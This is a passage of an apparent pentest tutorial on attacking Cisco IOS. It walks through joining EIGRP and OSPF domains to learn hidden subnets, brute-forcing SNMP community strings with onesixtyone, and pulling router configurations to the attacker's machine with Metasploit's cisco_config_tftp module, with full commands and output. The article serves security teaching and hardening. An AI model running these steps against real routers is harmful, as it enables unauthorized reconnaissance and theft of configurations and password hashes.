Now you need to start the EIGRP process with an AS number of 100, and declare your address with a /32 mask to set the neighborhood.

kali# config t
kali(config)# router eigrp 100
kali(config-router) network 192.168.1.103/32
Traffic at the time of EIGRP neighborhood establishment

The screenshot above shows the EIGRP traffic, at the time the neighborhood was set up. To see a list of your EIGRP neighbors:

kali# show ip eigrp neighbors
EIGRP neighbors
Routing table

After establishing the neighborhood between the attacker and the EIGRP speaker, two new subnets, 10.134.25.0/24 and 10.178.121.0/24, appeared in the attacker's routing table
This is the collection of subnet information by, shall we say, abusing dynamic routing protocols.

Searching for subnets with OSPF

OSPF (Open Shortest Path First), an intradomain dynamic routing protocol, is used in almost every major corporate network.
In the context of an attack, it can also be useful, it is a subnet search. Same trick as with EIGRP.
However, you have to realize that OSPF and EIGRP are completely different protocols, with their own philosophy.

You must enable the ospfd daemon to run the OSPF process on the attacker's computer:

ospfd=yes

You then need to connect to the OSPF domain, this is done by declaring your address. In my case it is 192.168.1.103/32, the area is 0.0.0.0

kali# conf t
kali(config)# router ospf
kali(config-router)# network 192.168.1.103/32 area 0.0.0.0
kali(config-router)# 

This is traffic at the time of neighbor establishment, OSPF service message exchange (DB Description, LSU, LSR, LSAck):

OSPF neighboring is established, my neighbor is 192.168.1.89

kali# show ip ospf ne

Neighbor ID     Pri State           Up Time         Dead Time Address         Interface                        RXmtL RqstL DBsmL
10.134.25.11      1 Full/DR         2m07s             35.482s 192.168.1.89    eth0:192.168.1.103                   0     0     0

kali# 

If we look at the routing table, we see new routes!

kali# show ip route
Codes: K - kernel route, C - connected, L - local, S - static,
       R - RIP, O - OSPF, I - IS-IS, B - BGP, E - EIGRP, N - NHRP,
       T - Table, v - VNC, V - VNC-Direct, A - Babel, F - PBR,
       f - OpenFabric, t - Table-Direct,
       > - selected route, * - FIB route, q - queued, r - rejected, b - backup
       t - trapped, o - offload failure

K>* 0.0.0.0/0 [0/100] via 192.168.1.1, eth0, src 192.168.1.103, 00:08:36
O   10.134.25.0/24 [110/101] via 192.168.1.89, eth0 inactive, weight 1, 00:02:19
O   10.178.121.0/24 [110/101] via 192.168.1.89, eth0 inactive, weight 1, 00:02:19
O>* 192.168.1.0/24 [110/100] is directly connected, eth0, weight 1, 00:02:22
L>* 192.168.1.103/32 is directly connected, eth0, 00:08:36

It's 10.134.25.0/24 and 10.178.121.0/24
The attacker learned information about them without the use of scanning. This is the benefit of this trick, simple FRR setup, neighborhood setup and gathering information about existing networks. It's as simple as that.

Router Configuration Upload

If an attacker finds an SNMP RW string against a Cisco router, they will be able to offload the configuration of the router itself in plaintext. You can use a Metasploit module called cisco_config_tftp to do this. By obtaining such a configuration file, an attacker can learn about infrastructure features, learn hashes, attempt to brute forcethem, etc.

Actually a fairly simple attack vector, first find the RW string and then run the MSF module.

Found SNMP port on Cisco router

SNMP RW string bruteforce can be performed using onesixtyone:

caster@kali:~$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt 192.168.1.89 
Scanning 1 hosts, 3219 communities
192.168.1.89 [public] Cisco IOS Software [Amsterdam], Virtual XE Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 17.3.2, RELEASE SOFTWARE (fc3)  Technical Support: http://www.cisco.com/techsupport  Copyright (c) 1986-2020 by Cisco Systems, Inc.  Compiled Sat 31-Oct-20 13:1
192.168.1.89 [public] Cisco IOS Software [Amsterdam], Virtual XE Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 17.3.2, RELEASE SOFTWARE (fc3)  Technical Support: http://www.cisco.com/techsupport  Copyright (c) 1986-2020 by Cisco Systems, Inc.  Compiled Sat 31-Oct-20 13:1
192.168.1.89 [cisco] Cisco IOS Software [Amsterdam], Virtual XE Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 17.3.2, RELEASE SOFTWARE (fc3)  Technical Support: http://www.cisco.com/techsupport  Copyright (c) 1986-2020 by Cisco Systems, Inc.  Compiled Sat 31-Oct-20 13:1
Found SNMP Community strings

In my case, it is the string cisco that has RW permissions that is used for this attack

Now you need to run MSF and the cisco_config_tftp module

caster@kali:~$ msfconsole

msf6 > auxiliary/scanner/snmp/cisco_config_tftp
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > show options

Module options (auxiliary/scanner/snmp/cisco_config_tftp):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COMMUNITY  public           yes       SNMP Community String
   LHOST                       no        The IP address of the system running this module
   OUTPUTDIR                   no        The directory where we should save the configuration files (disabled by default)
   RETRIES    1                yes       SNMP Retries
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      161              yes       The target port (UDP)
   SOURCE     4                yes       Grab the startup (3) or running (4) configuration (Accepted: 3, 4)
   THREADS    1                yes       The number of concurrent threads (max one per host)
   TIMEOUT    1                yes       SNMP Timeout
   VERSION    1                yes       SNMP Version <1/2c>


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/snmp/cisco_config_tftp) > 

By specifying the string, address, and directory where the Cisco configuration file will be uploaded, the module will upload the configuration file:

msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set COMMUNITY cisco
COMMUNITY => cisco
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set RHOSTS 192.168.1.89
RHOSTS => 192.168.1.89
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > set OUTPUTDIR /home/caster/
OUTPUTDIR => /home/caster/
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > run

[*] Starting TFTP server...
[*] Scanning for vulnerable targets...
[*] Trying to acquire configuration from 192.168.1.89...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Providing some time for transfers to complete...
[*] Incoming file from 192.168.1.89 - 192.168.1.89.txt 6210 bytes
[*] Saved configuration file to /home/caster/192.168.1.89.txt
[*] Shutting down the TFTP service...
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/snmp/cisco_config_tftp) > 
Reading an uploaded configuration file

Thus, when an RW string is detected, you can read Cisco router configuration files without authentication. It is highly recommended to use more complex community strings, filter access to the SNMP port using ACLs.

Config Analyzing

CCAT - is a tool that automates the process of finding network security issues in a Cisco IOS configuration file. It is quite a powerful solution, as it analyzes in detail every part of the configuration, routing, switch ports, DP, etc

caster@kali:~/ccat$ python3 ccat.py ~/192.168.1.89.txt
Configuration analysis with CCAT

This tool makes life easier for network engineers and system administrators. CCAT also allows you to improve the quality of device hardening.

Outro

In this article I have demonstrated attacks on Cisco IOS, I expect this article will help both pentesters and network security professionals.

Subscribe to exploit.org

Don’t miss out on the latest issues. Sign up now to get access to the library of members-only issues.
[email protected]
Subscribe